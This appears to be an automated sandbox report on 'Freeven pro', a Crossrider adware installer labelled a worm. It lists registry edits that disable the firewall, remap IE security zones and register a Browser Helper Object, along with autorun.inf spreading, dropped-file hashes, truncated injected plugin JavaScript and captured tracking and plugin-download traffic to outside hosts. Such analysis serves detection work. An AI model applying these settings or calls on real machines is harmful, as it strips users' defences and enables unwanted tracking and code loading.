"JavaScript" = "if(typeof jQuery!==undefined&&(jQuery)&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){(function(d,c,e){var a,b;d.uaMatch=function(h){h=h.toLowerCase();var g=/(opr)[\/]([\w.] )/.exec(h)||/(chrome)[ \/]([\w.] )/.exec(h)||/(firefox)[ \/]([\w.] )/.exec(h)||/(webkit)[ \/]([\w.] )/.exec(h)||/(opera)(?:.*version|)[ \/]([\w.] )/.exec(h)||/(msie) ([\w.] )/.exec(h)||h.indexOf(trident)>=0&&/(rv)(?::| )([\w.] )/.exec(h)||h.indexOf(compatible)<0&&/(mozilla)(?:.*? rv:([\w.] )|)/.exec(h)||[];var f=/(ipad)/.exec(h)||/(iphone)/.exec(h)||/(android)/.exec(h)||/(windows)/.exec(h)||/(mac)/.exec(h)||/(linux)/.exec(h)||/(ubuntu)/.exec(h)||[];return{browser:g[1]||,version:g[2]||0,platform:f[0]||};};a=d.uaMatch(c.navigator.userAgent);b={};if(a.browser){b[a.browser]=true;b.name=(b.rv?msie:a.browser);b.version=a.version;}if(a.platform){b[a.platform]=true;b.os=(a.platform===windows?win:a.platform);}if(b.chrome||b.opr){b.webkit=true;}else{if(b.webkit){b.safari=true;}}if(b.rv){b5"
[HKCU\Software\Freeven pro\Plugins\191]
"Name" = "ciuvo_m"
[HKCU\Software\Freeven pro\Plugins\91]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/monetizationLoader.js"
[HKCU\Software\Freeven pro\Plugins]
"PopupPluginList" = "42,38,46,41,44,39,35,43,36,4,14,78,13,64,207,47,182,72,94"
[HKCU\Software\Freeven pro\Installer]
"StatsDomain" = "http://stats.clientstaticserv.com"
[HKCU\Software\Freeven pro\Plugins\21]
"JavaScript" = "var CrossriderDebugManager=(function(h){var f={appId:appAPI._cr_config.appID(),url:appAPI._cr_config.debug_app};return h.Class.extend({init:function(){if(appAPI.isMatchPages.apply(this,f.url.debug_page)){h(document).ready(function(){h(body).bindExtensionEvent(debug_request_data,function(j,i){if(i.appId==f.appId){e();}});h(body).bindExtensionEvent(debug_request_reload_background,function(j,i){if(i.appId==f.appId&&appAPI.internal.reloadBackground){appAPI.internal.reloadBackground();}});h(body).bindExtensionEvent(debug_request_reload_plugins,function(j,i){if(i.appId==f.appId){appAPI.resources.requestReload();setTimeout(appAPI.internal.forceUpdate,750);}});h(body).bindExtensionEvent(debug_mode_activate,function(j,i){if(i.appId==f.appId){b(i);}});h(body).bindExtensionEvent(debug_mode_deactivate,function(j,i){if(i.appId==f.appId){d();}});h(body).bindExtensionEvent(debug_request_database,function(j,i){if(i.appId==f.appId){c(i);}});h(body).bindExtensionEvent(debug_request_database_remove,5"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Worm modifies the IE security zone settings to map all local web nodes that have no dots in their names and do not belong to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Worm modifies the IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Worm modifies the IE security zone settings to map all URLs to the Intranet Zone:
"IntranetName" = "1"
The Worm deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process NOTEPAD.EXE:2288 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5D 31 93 D5 0E 96 D6 4A F1 F0 59 6B D8 9E A5 62"
The process NOTEPAD.EXE:2120 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B8 17 A7 EB 6D 16 BC 68 1A 3A 34 B0 62 B4 1E 5F"
The process NOTEPAD.EXE:2332 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0E D1 8D AA A7 4A DB 98 1F 7C D0 E1 13 63 28 B6"
The process NOTEPAD.EXE:556 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4A 8A 59 84 A6 7A 52 F4 61 0A 56 7A 5B 7E C0 C0"
The process NOTEPAD.EXE:836 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "56 BF F8 F9 20 37 7D 7A 80 1D 6D 67 E8 2A AD E0"
The process NOTEPAD.EXE:2228 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AE F2 14 E4 5F 46 56 47 16 B0 E3 13 BF F3 D6 42"
The process NOTEPAD.EXE:3472 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2A 35 E2 84 00 53 F0 39 14 4E 83 A6 A1 17 01 A7"
The process NOTEPAD.EXE:2524 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DD 29 67 E8 C9 7D 71 78 30 E0 4A 0E 37 6F F0 90"
The process NOTEPAD.EXE:2604 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "85 FD 26 87 02 32 DC 78 54 FD 99 DC 73 35 18 F8"
The process NOTEPAD.EXE:3804 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BE C9 E6 7D 47 7C C1 F2 37 F1 B9 02 A1 00 3E 08"
The process NOTEPAD.EXE:2896 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 8D 34 72 1C FE 6E 6D D4 F5 A3 50 37 75 75 BF"
The process NOTEPAD.EXE:3944 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "45 D2 3F FB EA 01 46 3F B7 94 13 65 F3 2A AD 94"
The process NOTEPAD.EXE:1136 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FF 93 1D 2B D2 5B AF A3 16 17 40 0D F9 0A 45 F3"
The process NOTEPAD.EXE:3852 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6B C2 99 CD 18 66 62 51 DA A7 52 EC FB F7 5C B8"
The process NOTEPAD.EXE:2152 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "96 D8 EF FF 02 7E 40 81 B9 36 99 B1 78 6C B5 97"
The process NOTEPAD.EXE:296 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 99 72 A9 DE 8F 96 EA 17 D5 F8 DA 41 3A BD 4C"
The process NOTEPAD.EXE:2516 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "48 80 2A 25 1D 89 12 B4 95 21 E2 F4 13 A7 B7 9E"
The process NOTEPAD.EXE:2188 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D8 A6 EB 90 92 69 20 9A 63 82 96 98 03 87 A3 5C"
The process NOTEPAD.EXE:3896 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "10 17 97 35 F2 01 44 B5 6A 94 B2 56 DD 20 8B 74"
The process netsh.exe:2816 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DoNotAllowExceptions" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"BitNames" = " NAP_TRACE_BASE NAP_TRACE_NETSH"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"Guid" = "710adbf0-ce88-40b4-a50d-231ada6593f0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"Guid" = "b0278a28-76f1-4e15-b1df-14b209a12613"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E4 28 6D 50 FD BC 55 2E 61 8D 49 30 73 9F 58 A2"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
A firewall is disabled:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = "0"
The process netsh.exe:872 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DoNotAllowExceptions" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"BitNames" = " NAP_TRACE_BASE NAP_TRACE_NETSH"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"Guid" = "710adbf0-ce88-40b4-a50d-231ada6593f0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"Guid" = "b0278a28-76f1-4e15-b1df-14b209a12613"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "09 07 3D F5 4F F0 60 56 5E 9A B5 D7 76 77 D3 8A"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
A firewall is disabled:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = "0"
The process notepad.exe:2056 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3F 16 1D CB 6D 88 66 84 4E AB A5 84 D2 22 19 21"
The process regsvr32.exe:2376 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKCR\CLSID\{11111111-1111-1111-1111-110511421148}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\Interface\{55555555-5555-5555-5555-550555425548}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{66666666-6666-6666-6666-660566426648}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{11111111-1111-1111-1111-110511421148}\ProgID]
"(Default)" = "CrossriderApp0054248.BHO.1"
[HKCR\CLSID\{11111111-1111-1111-1111-110511421148}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
"(Default)" = ""
[HKCR\Interface\{66666666-6666-6666-6666-660566426648}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440544424448}"
"Version" = "1.0"
[HKCR\CLSID\{22222222-2222-2222-2222-220522422248}]
"(Default)" = "CrossriderApp0054248.Sandbox"
[HKCR\CrossriderApp0054248.BHO]
"(Default)" = "CrossriderApp0054248"
[HKCR\Interface\{55555555-5555-5555-5555-550555425548}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440544424448}"
[HKCR\CLSID\{22222222-2222-2222-2222-220522422248}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\CrossriderApp0054248.BHO\CurVer]
"(Default)" = "CrossriderApp0054248"
[HKCR\CLSID\{11111111-1111-1111-1111-110511421148}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440544424448}"
[HKCR\CrossriderApp0054248.Sandbox.1]
"(Default)" = "CrossriderApp0054248.Sandbox"
[HKCR\CLSID\{22222222-2222-2222-2222-220522422248}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440544424448}"
[HKCR\TypeLib\{44444444-4444-4444-4444-440544424448}\1.0\0\win32]
"(Default)" = "%Program Files%\Freeven pro\Freeven pro-bho.dll"
[HKCR\CLSID\{22222222-2222-2222-2222-220522422248}\InprocServer32]
"(Default)" = "%Program Files%\Freeven pro\Freeven pro-bho.dll"
[HKCR\Interface\{66666666-6666-6666-6666-660566426648}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CrossriderApp0054248.BHO.1]
"(Default)" = "CrossriderApp0054248"
[HKCR\Interface\{66666666-6666-6666-6666-660566426648}]
"(Default)" = "ISandBox"
[HKCR\CrossriderApp0054248.Sandbox.1\CLSID]
"(Default)" = "{22222222-2222-2222-2222-220522422248}"
[HKCR\CLSID\{22222222-2222-2222-2222-220522422248}\ProgID]
"(Default)" = "CrossriderApp0054248.Sandbox.1"
[HKCR\CLSID\{22222222-2222-2222-2222-220522422248}\VersionIndependentProgID]
"(Default)" = "CrossriderApp0054248.Sandbox"
[HKCR\CrossriderApp0054248.Sandbox\CLSID]
"(Default)" = "{22222222-2222-2222-2222-220522422248}"
[HKCR\Interface\{55555555-5555-5555-5555-550555425548}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{11111111-1111-1111-1111-110511421148}\VersionIndependentProgID]
"(Default)" = "CrossriderApp0054248"
[HKCR\CLSID\{11111111-1111-1111-1111-110511421148}\Implemented Categories]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "78 7C B2 F8 08 FC 24 B5 46 43 86 E1 A9 44 DD 68"
[HKCR\CrossriderApp0054248.BHO.1\CLSID]
"(Default)" = "{11111111-1111-1111-1111-110511421148}"
[HKCR\CLSID\{11111111-1111-1111-1111-110511421148}]
"(Default)" = "Freeven pro"
[HKCR\CLSID\{11111111-1111-1111-1111-110511421148}\InprocServer32]
"(Default)" = "%Program Files%\Freeven pro\Freeven pro-bho.dll"
[HKCR\CrossriderApp0054248.BHO\CLSID]
"(Default)" = "{11111111-1111-1111-1111-110511421148}"
[HKCR\TypeLib\{44444444-4444-4444-4444-440544424448}\1.0\HELPDIR]
"(Default)" = "%Program Files%\Freeven pro"
[HKCR\TypeLib\{44444444-4444-4444-4444-440544424448}\1.0]
"(Default)" = "CrossriderApp0054248 Type Library"
[HKCR\CrossriderApp0054248.Sandbox\CurVer]
"(Default)" = "CrossriderApp0054248.Sandbox"
[HKCR\Interface\{55555555-5555-5555-5555-550555425548}]
"(Default)" = "ICrossriderBHO"
[HKCR\CrossriderApp0054248.Sandbox]
"(Default)" = "CrossriderApp0054248.Sandbox"
[HKCR\Interface\{55555555-5555-5555-5555-550555425548}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\TypeLib\{44444444-4444-4444-4444-440544424448}\1.0\FLAGS]
"(Default)" = "0"
It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110511421148}]
"NoExplorer" = "1"
"(Default)" = "CrossriderApp0054248"
The Worm deletes the following registry key(s):
[HKCR\CLSID\{11111111-1111-1111-1111-110511421148}\Implemented Categories]
[HKCR\CLSID\{22222222-2222-2222-2222-220522422248}\ProgID]
[HKCR\CLSID\{22222222-2222-2222-2222-220522422248}]
[HKCR\CLSID\{11111111-1111-1111-1111-110511421148}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
[HKCR\CLSID\{11111111-1111-1111-1111-110511421148}\Programmable]
[HKCR\CLSID\{11111111-1111-1111-1111-110511421148}\TypeLib]
[HKCR\CLSID\{22222222-2222-2222-2222-220522422248}\InprocServer32]
[HKCR\CLSID\{22222222-2222-2222-2222-220522422248}\Programmable]
[HKCR\CLSID\{11111111-1111-1111-1111-110511421148}\ProgID]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110511421148}]
[HKCR\CLSID\{22222222-2222-2222-2222-220522422248}\TypeLib]
[HKCR\CLSID\{11111111-1111-1111-1111-110511421148}\VersionIndependentProgID]
[HKCR\CLSID\{11111111-1111-1111-1111-110511421148}]
[HKCR\CLSID\{11111111-1111-1111-1111-110511421148}\InprocServer32]
[HKCR\CLSID\{22222222-2222-2222-2222-220522422248}\VersionIndependentProgID]
The process Freeven pro-bg.exe:2444 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A3 9C 3D 98 A6 80 B8 26 7B 83 71 FD 8F 9F 9E 01"
Dropped PE files
| MD5 | File path |
|---|---|
| 2392e63270923f75c15acc12e0bca68d | c:\Program Files\Freeven pro\875f2efa-2a31-4c0f-be39-9293cb48929c-2.exe |
| 7acbb2626b7c3eb09c3a789fa4c643ef | c:\Program Files\Freeven pro\875f2efa-2a31-4c0f-be39-9293cb48929c-3.exe |
| 8c926c9bddc514d51721810549931684 | c:\Program Files\Freeven pro\875f2efa-2a31-4c0f-be39-9293cb48929c-4.exe |
| d800d4c37b42e60fa009f56dc8c1e55a | c:\Program Files\Freeven pro\875f2efa-2a31-4c0f-be39-9293cb48929c-5.exe |
| 20d685dac506106f6488f014475a4d4c | c:\Program Files\Freeven pro\Freeven pro-bg.exe |
| 6feda0e61a6843511db89969f8485ed9 | c:\Program Files\Freeven pro\Freeven pro-bho.dll |
| c0dc0684d8021439d22d7a553545d02b | c:\Program Files\Freeven pro\Freeven pro-codedownloader.exe |
| 54cb1914f155ee7cb6309400ca3e81e5 | c:\Program Files\Freeven pro\Uninstall.exe |
| 323acc3f1ae4165d152a3673c07d6d95 | c:\Program Files\Freeven pro\utils.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Worm's file once a user opens a drive's folder in Windows Explorer.
VersionInfo
Company Name: Tgeslexscrg
Product Name: Nwbgt
Product Version:
Legal Copyright: Axcqtl
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 23.25.18.22
File Description: Pfusuetjjzgt
Comments:
Language: English (United States)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 34880 | 35328 | 4.15051 | bb4ba76c16dfeef0912cc68f9edb1285 |
| .data | 40960 | 140 | 512 | 0.818128 | a5a710a52d844b19513b2cab5693dbc3 |
| .rdata | 45056 | 9108 | 9216 | 4.0908 | 004265d16597098398ce8e06897dcd29 |
| .bss | 57344 | 252880 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .idata | 311296 | 4868 | 5120 | 3.64756 | 20f692042b54593897a705a64d67ce50 |
| .ndata | 319488 | 286720 | 8192 | 0 | 0829f71740aab1ab98b33eae21dee122 |
| .rsrc | 606208 | 17184 | 17408 | 4.12231 | a7421e5fac485204160f3e6381e28702 |
| .odata | 626688 | 77824 | 77824 | 5.54121 | 708eea8efbddd2beddadb0a08e9db490 |
URLs
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
ET MALWARE Win32/Toolbar.CrossRider.A Checkin
Traffic
GET /monetization.gif?event=3&ibic=11992E1999324ACFB8E0C19B718E3265IE&verifier=283fbbb93af62851d4ee04659eadac21&campaign=001360&app=54248&bhover=1_34_05_04&xpiver=0_94&crxver=1_26_22&os=XP32&defbro=ie&chver=na&ffver=na&iever=6&starttime=1427668122&asw=00000000000000000000000000000000&asw2=00000000000000000010001000000000&browser=ie,de HTTP/1.1
Host: logs.clientstaticserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:28:49 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1427668129.dop004.fr7.t,1427668129.cds021.fr7.cGIF89a.............,...........D..;..
GET /stats.gif?action=daily&app=54248&bic=11992E1999324ACFB8E0C19B718E3265IE&ibic=11992E1999324ACFB8E0C19B718E3265IE&verifier=283fbbb93af62851d4ee04659eadac21&ver=1_34_05_04&installtime=1427668122&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001360&campaign=001360&subid=default_subid&zdata=default_zdata&ieprofiles=1&chprofiles=0&ffprofiles=0&runfrom=installer&appver=22&bgver=1&pluginsver=17&curtime=1427668122&lifetime=0&rnd=6720 HTTP/1.1
Accept: */*
Host: stats.clientstaticserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: bv7R7GvoHtkT6tZwDHTn5aGvv82bpoRuZfuwoQE7Y9eihDblVFiDgrF6TjNV4bMySYPxeldlZck=
x-amz-request-id: A00E4ABD3823A6B0
Date: Sun, 29 Mar 2015 22:29:11 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Mon, 24 Feb 2014 23:56:43 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3GIF89a.............,...........D..;..
GET /plugins/mins/375.js?ver=1&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1423049332"
Last-Modified: Wed, 04 Feb 2015 11:28:52 GMT
Cache-Control: max-age=900
Content-Length: 679
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668152.dop003.fr7.t,1427668152.cds023.fr7.cif (typeof setup2 === 'function') { setup2('MDE3MDc4NDMwMzFlMDUxMzJmMW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', 'zzqakjqczn'); }....
GET /plugins/mins/390.js?ver=1&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1425996283"
Last-Modified: Tue, 10 Mar 2015 14:04:43 GMT
Cache-Control: max-age=900
Content-Length: 823
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668152.dop003.fr7.t,1427668152.cds025.fr7.cif (typeof setup2 === 'function') { setup2('MGQ2ZDY4NWEwYzFmMTMxNTNiMD
